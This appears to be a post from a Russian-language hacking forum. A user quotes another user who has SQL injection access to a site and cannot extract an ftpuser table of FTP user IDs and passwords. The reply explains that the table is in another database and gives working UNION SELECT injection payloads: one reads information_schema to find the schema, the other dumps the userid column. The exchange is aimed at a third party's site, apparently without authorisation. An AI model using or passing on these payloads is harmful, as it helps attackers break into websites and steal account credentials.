Показать сообщение отдельно

  #1  
Старый 11.11.2010, 12:16
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
Сообщение от None  
Вообщем имеется сайт.
Есть доступ к mysql.user, Версия мускула 5.0.32-Debian_7etch8-log
bd работает под root, file_priv Y
Прочитать конфиг сервера через load_file() не получается почемуто = \
Так же в ошибке я вижу путь вида
/home/u1234/site.ru/www/file.php
В бд есть разные интересные таблицы, например нашол таблицу ftpuser с колонками:
id, userid, passwd, uid, gid, homedir
Но проблема в том что я из колонок таким запросом немогу ничего вывести.
+union+select+1,userid,3,4,5,6,7,8,9,10+from+ftpus er+limit+0,1+--+
Причем из любой таблицы и из лбой колонки. При таком запросе мне просто выдает ошибку. Если бы колонки были пустые, ошибки не было бы, просто показывало бы пустоту в 2ечке)
Есть у кого каикие нить соображения как вывести инфу из колонок ? или мб можно что то замутить с Y привилегией? )
значит таблицы в другой базе.

1. Узнаем базу под которой работает необходимая таблица

id=1+union+select+1,2,3,4,5,6,7,8,table_schema+fro m+information_schema.tables+where+table_name='им я_таблицы'--

2. Делаем запрос

id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+ мя_базы.ftpuser--
 
Ответить с цитированием